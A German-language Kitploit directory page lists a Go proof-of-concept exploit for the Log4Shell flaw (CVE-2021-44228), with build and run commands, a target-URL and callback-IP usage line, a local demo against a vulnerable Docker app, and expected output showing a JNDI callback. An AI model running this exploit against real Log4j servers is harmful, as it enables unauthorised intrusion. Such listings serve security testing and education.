Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44228 — Ein einfacher Log4j PoC geschrieben in Go | Kitploit
Tools/GitHubGitHub/sorrence/cve-2021-44228
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubsorrence/cve-2021-44228

CVE-2021-44228

Ein einfacher Log4j PoC geschrieben in Go

Repository anzeigen
vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44228 PoC (Log4Shell)

⚠️ Haftungsausschluss:
Dieses Tool ist ausschließlich für Bildungszwecke, Sicherheitsforschung und kontrollierte Testumgebungen bestimmt.
Die Nutzung gegen Systeme ohne ausdrückliche Erlaubnis ist illegal und liegt vollständig in der Verantwortung des Benutzers.


📌 Beschreibung

Dieses Projekt enthält einen einfachen Proof-of-Concept (PoC)-Exploit für die Apache Log4j2 (CVE-2021-44228)-Sicherheitslücke.
Der PoC sendet einen speziell präparierten HTTP-Header mit einer JNDI LDAP-Nutzlast an das Ziel.
Wenn das Ziel angreifbar ist, sendet es einen Callback an die angegebene LHOST-Adresse.


🚀 Verwendung

1️⃣ Build

root@kitploit:~
go build -o exploit exploit.go

2️⃣ Ausführung

root@kitploit:~
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
  • -r → Ziel-URL (Endpunkt der angreifbaren Anwendung)
  • -l → Ihre Callback-Listener-IP-Adresse (der Rechner, auf dem der PoC läuft)

🛠️ Beispiel

Mit der bereitgestellten Docker-verwundbaren App:

root@kitploit:~
# Verwundbare App ausführen
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app

# Exploit ausführen
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1

Erwartete Ausgabe:

root@kitploit:~
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE
Tool herunterladen